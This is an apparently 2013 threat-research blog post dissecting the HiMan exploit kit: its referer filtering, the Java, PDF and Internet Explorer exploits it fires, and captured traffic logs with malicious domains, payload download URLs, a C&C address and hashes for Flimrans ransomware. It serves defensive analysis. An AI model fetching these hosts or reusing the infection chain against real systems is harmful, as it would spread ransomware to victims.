2013-10-02 - Study HiMan Exploit Kit. Say Hi to one more.

For the Thumbnail





(just because it should be less boring)

from Eoin

(link to its presentation at ShmooCon 2013)

(link to github)





So HiMan is not the real name of this Exploit Kit. It seems to be High Load but as HighLoad is a reputable security conference that stands in Russia we won't use this name. (for the same kind of reasons, we are now talking about what we previoulsy called PopAds as Magnitude).





HiMan EK login Screen - "Power by High Load, 2013"

I didn't heard about any public advert for this Exploit Kit, but ping me if there is and you know where :)





What is tricky with this one is that it seems there is whitelisting filter on referer.

Wrong referer : bye ! (obviously wrong country, wrong browser, known ip..same way).





HiMan driving you out.

Landing > jsdetect > windows.location = out.

(don't know why it's not being done directly on landing... all stats related functions in index ? ).





Post to index.php contains upper referer





Post to index with Correct Referer and Fresh IP.

To study this should help knowing which pierced armor we must show HiMan to get all the bullets :





Conditions allow you to guess what will hit you.

except maybe for IE





CVE-2011-3544 : Java2 (cause CVE-2013-2465 crash for older version of jre6)



GET http://fifallllolka .info/xuguczel.php 200 OK (text/html)

GET http://fifallllolka .info/js/jquery.js 200 OK (application/javascript)

POST http://fifallllolka .info/index.php 200 OK (text/html)

java2 in HiMan 2013-10-02 We can easily see this in the noise.



GET http://fifallllolka .info/xufomav/b.jar 200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627





GET http://fifallllolka .info/com.class 404 Not Found (text/html) GET http://fifallllolka .info/edu.class 404 Not Found (text/html) GET http://fifallllolka .info/net.class 404 Not Found (text/html) GET http://fifallllolka .info/org.class 404 Not Found (text/html) GET http://fifallllolka .info/com.class 404 Not Found (text/html) GET http://fifallllolka .info/edu.class 404 Not Found (text/html) GET http://fifallllolka .info/net.class 404 Not Found (text/html) GET http://fifallllolka .info/org.class 404 Not Found (text/html)

Getting System Properties for Stats Purposes

Piece of dwq.class in b.jar - HiMan 2013-10-02 And passing them to payload URLs

Piece cdcdc44 class in b.jar - HiMan 2013-10-02 GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16 200 OK (application/octet-stream)





Payload is a zip





a.jar function to deal with the Zip payload

(didn't spent time on it)

containing Flimrans Ransomware :





Flimrans these days

As often with affiliates it's the same icon over every infection vectors :

built / packed at the same place

-----------Out of topic : Payload-----------

(A ransomware that seems to have been first pushed in Flimkit (as dedicated family) in middle of may 2013. This was the same kind of couple as : Kore with Urausy/FakeAV.

I will make a post about it really soon it's here />. It's starting to be widely spread).



C&C : 95.211.239.222 16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1 Host: utipiguty.de Cache-Control: no-cache





--------------------------------------------





CVE-2013-2465 : Java1

HiMan CVE-2013-2465 Successful path 2013-10-01

GET http://fifallllllolka .info/sacixudy.php 200 OK (text/html)

GET http://fifallllllolka .info/js/jquery.js 200 OK (application/javascript)

POST http://fifallllllolka .info/index.php 200 OK (text/html)

java1() in HiMan 2013-10-02 GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de 200 OK (application/java-archive)

Piece of CVE-2013-2465 in a.jar GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45200 OK (application/octet-stream)



CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3

I'll fly over that one.

CVE-2013-2465 with embedded jnlp pass (the js size 0 is artifact - cached)

GET http://fifalllolka .info/xalbigki.php 200 OK (text/html)

GET http://fifalllolka .info/js/jquery.js 304 Not Modified () (artifact - cached here)

POST http://fifalllolka .info/index.php 200 OK (text/html)

java3 in HiMan 2013-10-02



GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously) 200 OK (application/java-archive)

GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11 200 OK (application/octet-stream)



CVE-2010-0188 :





It's assumption that it's libtiff as there is an Embedded file. Didn't spend enough time on it .Wepawet and VirusTotal were helpless here.

CVE-2010-0188 Successful pass in HiMan 2013-10-02

GET http://aakrinopidarasti .info/vibqilro.php

200 OK (text/html)

GET http://aakrinopidarasti .info/js/jquery.js

200 OK (application/javascript)

POST http://aakrinopidarasti .info/index.php

200 OK (text/html)

GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11

200 OK (application/pdf)





HiMan's PDF in PDFStreamDumper.









The object after some light deobfus

(mainly replacing "hello prettylame iwnzzz" by %)

After the eval





<edit1 2013-10-03>



@kafeine I think the payload is the same, but depending on the Adobe reader version the exploit bytes change. hvkhhttgc will be shellcode..

— Jose Miguel Esparza (@EternalTodo) October 3, 2013

@kafeine Shellcode using XOR to decode itself, URLDownloadToCacheFileW to download and CreateProcess to execute it.

— Jose Miguel Esparza (@EternalTodo) October 26, 2013 </edit1>



GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US

200 OK (application/octet-stream) (same Flimrans)





GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1

200 OK (application/octet-stream) [Have to stop here for now- will digg in it to findout why 2 payloads call ] GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US200 OK (application/octet-stream) (same Flimrans)GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1200 OK (application/octet-stream)





CVE-2013-2551 : (working here....)

CVE-2013-2551 in HiMan - 2013-10-01

GET http://akrinopidarasti .info/wywetukr.php 200 OK (text/html)

GET http://akrinopidarasti .info/js/jquery.js 200 OK (application/javascript)

POST http://akrinopidarasti .info/index.php 200 OK (text/html)

IE Check Before Fireing

(note : on another pass)

Cleaning to see a little better

(note : it's another pass so pattern do not match this one) GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79 200 OK (text/html)

Piece of CVE-2013-2551



GET http://37.200.65.58/222.exe 200 OK (application/octet-stream) 92c2ad1ca04e431100313b9468842c0d Content-Length: 1536

VT TimeStamp What happen once "infected" ?





CVE-2013-2551 Payload





Exploitation Graph :

Files :